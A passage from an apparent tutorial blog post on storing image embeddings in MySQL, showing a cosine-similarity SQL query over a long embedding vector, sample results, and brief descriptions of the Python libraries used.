0.4338991641998291, 0.3174438774585724, -0.2427300065755844, -0.15270879864692688, -0.13448885083198547, -0.03258641064167023, 1.4516336917877197, 0.2088334858417511, -0.07482234388589859, -0.060038354247808456, -0.09696637094020844, 0.2288440763950348, -0.45773571729660034, -0.442022442817688, -0.1333482265472412, 0.20572619140148163, 0.022368118166923523, 0.2268296778202057, 0.0717138946056366, -0.18176983296871185, -0.08150641620159149, -0.3742990493774414, -0.08863221853971481, 0.24395513534545898, 0.14680302143096924, 0.45115935802459717, 0.07179692387580872, 0.13299871981143951, -0.6536737680435181, -0.10842005163431168, 0.46789559721946716, -0.09359163045883179, -0.029734283685684204, -0.4210904538631439, 0.44143062829971313, -0.2495618760585785, 0.16764293611049652, -0.0010016188025474548, 0.12750700116157532, -0.09728701412677765, -0.33462393283843994, -0.19563797116279602, 0.38896551728248596, -0.07021686434745789, 0.05845819413661957, -0.2159923017024994, 0.22142955660820007, 0.08275012671947479, 0.08141633123159409, 0.011051833629608154, -0.0470392107963562, 0.2281772345304489, 0.1281975507736206, -0.2673131823539734, 0.09869228303432465, -0.46927496790885925, 0.5890671014785767, -0.26286429166793823, 0.029046714305877686, -6.433596611022949, 0.8787387609481812, -0.3467825651168823, 0.3790345788002014, 0.04438466578722, 0.651203453540802, -0.34149351716041565, -0.8458610773086548, 0.034017741680145264, -0.2053813338279724, 0.35773321986198425, 0.04032140225172043, 0.30020737648010254, -0.20292143523693085, -0.6659493446350098, -0.14945490658283234, -0.08128952980041504, 0.037803277373313904, -0.24363872408866882, -0.5452983975410461, -0.15123391151428223, 0.06196553260087967, 0.0037244856357574463, 0.37201881408691406, 0.3830801248550415, 0.038900259882211685, 0.5477883815765381, -0.2165623903274536, -0.12358544021844864, 0.6665405035018921, 0.08692356944084167, -0.7012655138969421, -0.2776182293891907, -0.10287892073392868, -0.16323958337306976, 0.29088079929351807, 0.17843754589557648, -0.041389890015125275, -0.206215500831604, 0.8713011741638184, 0.10298433899879456, 0.8146358132362366, 0.5424628257751465, 0.2975153625011444, -0.013563252985477448, 0.13421256840229034, -0.3498159945011139, -0.3292694687843323, -0.2611740529537201, 0.026821553707122803, -0.4656805992126465, 0.733379602432251, 0.09556902945041656, 0.031042248010635376, 0.3466207981109619, 0.470894992351532, -0.24531006813049316, 0.09481766074895859, -0.07527203112840652, -0.3095394968986511, 0.6393522024154663, -0.09749913960695267, -0.11673454940319061, -0.17871969938278198, -0.1564812809228897, 0.2511930465698242, -0.13378417491912842, 0.17615115642547607, -0.06127139925956726, -0.04496309161186218, -0.35364609956741333, -0.08319900929927826, 0.14410080015659332, -0.2627147138118744, 0.9161733388900757, 0.37756675481796265, 0.1632954180240631, 0.0905647948384285, -0.10490548610687256, 0.33364954590797424, -0.05363786220550537, -0.6529805064201355, 0.26767054200172424, 0.26338034868240356, -1.0595732927322388, -0.22944216430187225, -0.26375362277030945, -0.1988820880651474, -0.12509888410568237, 0.24070680141448975, -0.2588941156864166, -0.33498746156692505, 0.126882404088974, 0.17642360925674438, 0.040883928537368774, -0.0052263736724853516, -0.16343313455581665, 0.0562138706445694, 0.2096858024597168, 0.09584870934486389, -0.11106163263320923, 0.1729261875152588, 0.20461152493953705, 0.12263501435518265, 0.27892982959747314, -0.6255460381507874, -0.764202892780304, 0.14997950196266174, 0.16245627403259277, -0.37481117248535156, -0.06923999637365341, 0.6191018223762512, -0.2948871850967407, 0.261602520942688, -0.04764917492866516, -0.15079966187477112, -0.5841816067695618, 0.21257054805755615, -0.21506810188293457, -0.04135539382696152, 0.5817644596099854, 0.12262402474880219, 0.42174848914146423, 0.1265665739774704, 0.01666194200515747, 0.13379910588264465, -0.5832018256187439, -0.3252071738243103, 0.22216439247131348, 0.4046194851398468, 0.20799392461776733, -0.07600507140159607, -0.3153631389141083, -0.10026045888662338, 0.2151670753955841, -0.15998244285583496, -0.498496949672699, -0.04490187019109726, -0.3262564539909363, 0.2954603433609009, -0.07442381978034973, 0.24110326170921326, 0.17248889803886414, 0.45136961340904236, 0.13689523935317993, -0.4876601994037628, 0.050953567028045654, -0.5781422853469849, 0.39940330386161804, 0.08282990008592606, 0.12615060806274414, -0.29397282004356384, -0.1800389140844345, 0.6491589546203613, -0.46026864647865295, 0.35799282789230347, -0.2924331724643707, -0.43013110756874084, -0.3808341324329376, 0.55094313621521, 0.03232079744338989, -0.462185800075531, -0.313692569732666, 0.07338142395019531, 0.16393449902534485, -0.039127856492996216, 0.6098682880401611, -0.16981320083141327, -0.35463374853134155, -0.4267345666885376, -0.09102936089038849, 1.8269031047821045, 0.20107018947601318, 0.15080709755420685, 0.3966326117515564, 0.14836283028125763, 0.43229472637176514, -0.12651363015174866, 0.008955806493759155, -0.02638685703277588, 0.13089591264724731, 0.07453787326812744, -0.26478222012519836, -0.22489425539970398, 0.24618230760097504, 0.17845292389392853, -0.0707186758518219, -0.062373995780944824, -0.06923562288284302, 0.47168073058128357, -0.07979298382997513, -0.07240656018257141, 0.20423418283462524, 0.4307517111301422, -0.9086780548095703, 0.40964275598526, -0.23126669228076935, -0.28451400995254517, -0.020541366189718246, 0.2600404620170593, -0.10833749175071716, 0.036447957158088684, -0.36018478870391846, -0.12711986899375916, 0.2606499195098877, 0.2881711423397064, 0.7029435634613037, -0.1414911448955536, -0.0848516896367073, 0.3585105538368225, -0.04511311650276184, 0.24639412760734558, 0.4116198420524597, -0.4193349778652191, 0.5370025038719177, 0.4218825697898865, 0.03302404284477234, 0.04051119089126587, -0.4930671155452728, 0.12944979965686798, 0.8145080804824829, -0.49908819794654846, 0.19380804896354675, 0.09682479500770569, 0.4217352271080017, -0.5215371251106262, -0.06526830792427063, -0.26663315296173096, 0.2522737979888916, 1.213325023651123, 0.0012408196926116943, -0.2426946759223938, -0.28965428471565247, -0.3634025752544403, -0.13846488296985626, -0.3301095962524414, -0.12310884147882462, -0.03835451602935791, -0.7434549331665039, 0.24088844656944275, -0.17097029089927673, -0.13022029399871826, -0.007050663232803345, 0.06718186289072037, 0.45522329211235046, 0.10973918437957764, 0.012622185051441193, 0.16777338087558746, -0.05771467462182045, 0.19996578991413116, -0.24137984216213226, 0.24456733465194702, -0.11382054537534714, 0.010699808597564697, 0.19115638732910156, -0.0028515905141830444, -0.09564647823572159, 0.09341803193092346, 0.2944413125514984, 0.23297476768493652, -0.17356669902801514, 0.39457371830940247, -0.31496915221214294, 0.23409241437911987, -0.12645113468170166, -0.6129994988441467, -0.15042293071746826, -0.26337844133377075, 0.3586566150188446, 0.015362411737442017, -0.1516532152891159, 0.22309523820877075, -1.4553773403167725, 0.622140645980835, -0.5070102214813232, -0.7885435223579407, 0.1319749355316162, -0.446965754032135, -0.16092371940612793, 0.3529052436351776, 0.007851272821426392, 0.09744635224342346, 0.20603105425834656, -0.08496123552322388, 0.3391745984554291, 0.0328497439622879, 1.0089284181594849, 0.3865002393722534, 0.8738011121749878, 0.06040278077125549, -0.015890859067440033, -0.21144962310791016, 0.5995208621025085, 0.32733339071273804, 0.9662830829620361, 0.3483368158340454, 0.08898067474365234, 0.887071430683136, 0.3696739375591278, 0.19864115118980408, 0.03314075618982315, 0.03536325320601463, -0.12863528728485107, 0.06904687732458115, -0.24006515741348267, -0.012378469109535217, -0.5082074403762817, -0.7163709402084351, -0.1123851016163826, 0.010127410292625427, 0.4355129599571228, -0.6237277984619141, 0.2890245020389557, 0.5209721326828003, -0.15595661103725433, 0.08429825305938721, 0.09569454938173294, -0.23599457740783691, -0.16896066069602966, -0.004924099892377853, 0.6319135427474976, 0.4765503704547882, 0.01589702069759369, -0.05348372459411621, 0.055996619164943695, -0.5671727657318115, 0.15062867105007172, -0.5092383623123169, -0.058769792318344116, 0.09755947440862656, 0.2507498860359192, 0.08485430479049683, 0.0793701708316803, 0.021087057888507843, -0.5461320281028748, 0.304355651140213, -0.7253096699714661, 0.6294398307800293, -0.3105747103691101, 0.3905089199542999, 0.2852843105792999, -0.07321953773498535, 0.023653872311115265, -0.37693509459495544, 0.2675110697746277, 0.04210440814495087, 0.09981885552406311, -0.20424491167068481, 0.3030926287174225, 0.026748113334178925, 0.5781193375587463, 0.00048617273569107056, -0.1131657287478447, 0.2036598026752472, -0.2140207141637802, -0.011482134461402893, -0.2234390377998352, -0.43609818816185, -0.504375696182251, -0.01408250629901886, -0.06268232315778732, -0.3341209888458252, 0.29185229539871216, -0.2411029040813446, 0.5522151589393616, -0.06291865557432175, -0.3783164620399475, -0.2328968197107315, -0.3904339075088501, -0.11180463433265686, -0.16056767106056213, -0.16029603779315948, -0.2223338484764099, 0.33838483691215515, -0.23742935061454773, 0.12314961105585098, -0.5309375524520874, -0.07631200551986694, 0.35636740922927856, 0.17236372828483582, 0.19029422104358673, -0.1397394984960556, 0.5870028734207153, -0.4097609221935272, 0.15144716203212738, 0.003988280892372131, -0.05234433710575104, -0.2421717643737793, -0.006953790783882141, -0.5565206408500671, 0.06222153455018997, -0.07391542196273804, 0.40786826610565186, -0.04986128211021423, -0.285273939371109, -0.1444988250732422, 0.024988561868667603, -0.3689330816268921, -0.40285810828208923, -0.10759894549846649, -0.0395619198679924, 0.01536903902888298, 0.0707881823182106, 0.22722786664962769, 0.2506854236125946, 0.023645572364330292, -0.14591404795646667, 0.09581179171800613, -0.12541484832763672, 0.03997009992599487, -0.02025282382965088, -0.23364081978797913, 0.3128877580165863, 0.12357562780380249, -0.1596986949443817, 0.22576884925365448, -0.14733293652534485, 0.24771124124526978, 0.0026986300945281982, 0.5146662592887878]'); SELECT image_name, (my_dot_product(embedding, @target) / (my_vec_norm(embedding) * my_vec_norm(@target))) AS similarity FROM image_embeddings ORDER BY similarity DESC LIMIT 5; </code></pre> </div> <p>Example output:<br> <code>+------------+--------------------+<br> | image_name | similarity |<br> +------------+--------------------+<br> | img/t3.jpg | 1.0000000040388952 |<br> | img/t2.jpg | 0.9667246382795552 |<br> | img/t1.jpg | 0.9642200115094365 |<br> | img/t4.jpg | 0.9213785475357513 |<br> +------------+--------------------+</code><br> In this example, the target image is most similar to t3.jpg.</p> <h2> Source Code </h2> <p>All source files are available on GitHub:<br> <a href="https://github.com/knowledgebase21st/Software-Engineering/tree/dev/AI" rel="noopener noreferrer">GIT Source Codes</a></p> <h2> Role of the Libraries Used </h2> <h4> NumPy </h4> <p>Handles:</p> <ul> <li>arrays</li> <li>matrix operations</li> <li>linear algebra</li> </ul> <h4> PyTorch </h4> <p>Used for:</p> <ul> <li>building neural networks</li> <li>defining layers (Linear, CNN, Transformer)</li> <li>training models</li> <li>GPU acceleration</li> <li>backpropagation</li> </ul> <h4> sentence-transformers </h4> <p>This library converts text or images into dense vector embeddings using deep neural networks.<br> Internally the process is:<br> <code>Input → Transformer Model → Embedding Vector<br> </code></p> <h4> Pillow </h4> <p>Pillow is a Python library for image processing.<br> Before an image is passed to a neural network, it usually undergoes preprocessing such as:</p> <ul> <li>loading</li> <li>resizing</li> <li>cropping</li> <li>normalization</li> <li>converting to tensors</li> </ul> <p>Pillow helps perform these operations.</p> <h2> Real-World Use Cases </h2> <ul> <li>Images stored as vectors could be useful for many real world applications</li> <li>Search Image: Find similar images</li> <li>Ecommerce: Find visually similar products</li> <li>Check Duplicity: Detect very similar or duplicate image</li> <li>Prohibited Image: Identify prohibited or restricted image</li> </ul> <h2> Tested with: </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>- Python 3.12 - MySQL 9.x - sentence-transformers - PyTorch </code></pre> </div> <h2> Conclusion </h2> <p>Vector embeddings enable powerful capabilities such as:</p> <ul> <li>semantic search</li> <li>image similarity detection</li> <li>recommendation systems</li> <li>multimodal AI applications With modern databases like MySQL supporting vector storage, it becomes possible to build AI-powered search systems directly inside the database layer.</li> </ul> python vectordatabase mysql machinelearning